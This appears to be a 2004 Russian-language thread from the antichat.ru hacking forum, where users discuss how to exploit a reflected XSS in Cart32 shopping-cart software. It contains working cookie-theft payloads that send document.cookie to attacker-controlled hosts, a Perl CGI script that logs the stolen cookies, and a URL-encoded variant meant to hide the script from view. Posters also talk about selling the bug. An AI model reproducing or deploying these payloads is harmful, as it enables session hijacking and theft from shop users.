![]() |
как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script> для получения полезного |
Дай полный адрес
|
PUMA, а смысл использовать xss, если это подействует только на тебя ?
|
стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS'http://forum.antichat.ru/iB_html/non...icons/wink.gif</script>[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль... Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'> Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше Потом продашь кому-нибудь. Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ |
ну вот можно купить чтонибудь ///
а вот ещё один ктонибудь сможет реализовать ? VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system. The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues. Impact: A remote user may be able to cause database connections to stay open. Solution: The vendor has described a fix for 'shoprestoreorder.asp': |
А если по-думать головой?
<script>document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script> (cookie.cgi) #!/usr/bin/perl -w open COOKIES,">>../cookies.txt"; print "Content-Type: text/html\n\n"; print COOKIES "----------- new cookie -----------\n"; print COOKIES "$ENV{'QUERY_STRING'}\n"; print COOKIES "---------- end of cookie ---------\n\n"; close COOKIES; http://forum.antichat.ru/iB_html/non...cons/devil.gif |
acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
|
acidhack - Мне типа слово "COOKIES" напоминает кучку маленьких пирожков http://forum.antichat.ru/iB_html/non...ns/biggrin.gif
|
О! круто! Я догнал!!! А можно сделать так?
www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script> А в http://www.yyy.ru/ написать что-то типа PHP код:
http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =) |
Код:
xxx.ru/?search=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%69%6D%61%67%65%73%5B%30%5D%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%79%79%2E%72%75%2F%3F%F1%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E |
АААА =)))) че то до меня сразу то не дошло =))) все равно спасибо.
|
| Время: 18:20 |